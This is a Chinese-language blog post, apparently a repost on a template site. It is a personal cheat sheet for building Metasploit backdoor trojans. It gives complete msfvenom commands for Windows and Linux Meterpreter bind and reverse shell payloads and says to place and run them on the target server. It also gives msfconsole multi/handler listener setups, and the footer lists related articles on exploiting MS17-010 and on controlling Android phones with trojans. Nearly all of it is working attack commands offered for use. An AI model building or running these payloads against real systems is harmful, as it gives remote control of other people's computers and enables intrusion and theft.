MSF生成后门木马

这篇具有很好参考价值的文章主要介绍了MSF生成后门木马。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

为了方便平时使用,记录一下操作命令


一、正向连接的木马🍺

注意:lhost为本地地址,rhost为目标地址

1、👋Windows

生成连接木马

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.63.135 lport=6666 -f exe -o test.exe

将木马放到目标服务器运行

使用模块连接我们的木马

msfconsole                                         
use exploit/multi/handler                          
set payload windows/x64/meterpreter/bind_tcp  	   
set rhost 192.168.53.135					       # 目标主机ip
set lport 6666                                     
exploit 

2、👋Linux

使用msfvenom模块生成连接木马

msfvenom -p linux/x64/meterpreter/bind_tcp lhost=192.168.53.135 lport=6666 -f elf > test.elf
  • x64生成64位的🐎
  • x86生成32位的🐎

elf为可执行的二进制文件
若传入的木马没权限执行

chmod +x test.elf  # 给木马程序赋予可执行权限

使用模块进行连接

msfconsole                                        
use exploit/multi/handler                         
set payload linux/x64/meterpreter/bind_tcp  	 
set rhost 192.168.53.135					    # 目标主机ip  
set lport 6666                                    
exploit 

二、反向连接的木马🍺

1、👋Windows

使用模块生成反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.53.135 lport=6666 -f exe -o test.exe

监听反弹的木马

msfconsole                                         
use exploit/multi/handler                          
set payload windows/x64/meterpreter/reverse_tcp  	   
set lhost 192.168.53.135                          # 我们的本机IP
set lport 6666                                     
exploit                                           

2、👋Linux

生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.53.135  LPORT=6666 -f elf > test.elf

监听反弹的木马文章来源地址https://www.toymoban.com/news/detail-738194.html

msfconsole                                         
use exploit/multi/handler                          
set payload linux/x64/meterpreter/reverse_tcp  	  
set lhost 192.168.53.135                         
set lport 6666                                    
exploit                                           

到了这里,关于MSF生成后门木马的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

    msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

    例如: 1.使用msf进行ms17_010漏洞利用(成功拿到shell截图取证) 2.使用msfvonom进行权限维持(后门木马生成,利用第一步shell进行上传) 3.利用msf监听模块进行监听 1.使用nmap对靶机进行永恒之蓝漏洞扫描 命令:nmap -A 192.168.232.134 发现改IP存在永恒之蓝漏洞,利用msfconsole 进行攻

    2024年02月04日
    浏览(10)
  • 内网渗透 Metasploit(MSF)基础使用

    内网渗透 Metasploit(MSF)基础使用

    ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在 Metasploit 和综合报

    2024年01月16日
    浏览(15)
  • 内网渗透测试 MSF搭建socks代理

    内网渗透测试 MSF搭建socks代理

    最终效果为如此,web服务器可以ping通外网和内网两台服务器     信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 现在咱们查询一下日志功能是否开启,默认是关闭的。 show variables like \\\"general_log%\\\"; 命令行 set globalgeneral_log=\\\'on\\\'; 图形化: 输入一句话木马并执行,使日志

    2023年04月08日
    浏览(11)
  • 153.网络安全渗透测试—[Cobalt Strike系列]—[生成hta/exe/宏后门]

    153.网络安全渗透测试—[Cobalt Strike系列]—[生成hta/exe/宏后门]

    我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!!! 1、hta后门 (1)HTA简介:HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件没什么差

    2023年04月08日
    浏览(15)
  • 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

    内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

    前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html 网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan CFS三层靶场搭建: 内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSD

    2024年02月02日
    浏览(16)
  • 内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线

    内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线

      本章主要涉及到的技术就是如何让攻击机通过能够上网的主机当作跳板去连接内网中不能上网的主机,有点绕口。不过通过介绍页能够大概明白是什么意思。   在我们做渗透的时候,通常企业都会设定有些软硬件防火墙,当企业有业务需求的时候会通过防火墙放通地址

    2024年02月05日
    浏览(13)
  • Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用

    Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用

    博主根据日后学习会不断更新文章,后续用到新的功能会不定时更新。 以下内容只供学习使用,请勿违法使用! 目录 一、常用指令 二、监听模块 2.1 防止假session 2.2 实现后台持续监听 三、msfvenom(payload生成模块) 3.1 参数介绍 3.2 常用指令 3.3 payload 生成 3.3.1 Linux 3.3.2 Windows

    2024年02月07日
    浏览(29)
  • 【网络安全】-基本工具msf

    【网络安全】-基本工具msf

    msf (metasploit framework)是一个 开源的渗透测试框架 ,用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的 渗透测试工具 、 漏洞利用模块 和 负载模块 ,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。它支持多种操作系统,包括

    2024年01月24日
    浏览(15)
  • 第124天:内网安全-代理技术&Socks协议&路由不出网&后渗透通讯&CS-MSF上线

    第124天:内网安全-代理技术&Socks协议&路由不出网&后渗透通讯&CS-MSF上线

    个人理解 1、相当于本来流程是:解决网络通信问题 — 拿到权限 — 进行后门控制,但这里小迪只讲了如何解决网络通信问题和如何进行后门控制,拿到权限属于横向移动的内容后面才讲。 2、在本次实验环境中,Win 7主机有外网出口而其余主机没有,所以我们将Win 7当作跳板

    2024年02月13日
    浏览(12)
  • msf使用木马控制android手机

    msf使用木马控制android手机

    msf使用木马控制android手机 kali、手机模拟器(或不用的手机)。 手机模拟器(或者手机)与电脑可以互相连通吗,即手机可以直接访问到kali。 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.32.135 lport=4444 android_shell.apk ; 2、手机安装木马。 想办法把木马放到手机模拟器(

    2024年02月10日
    浏览(10)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包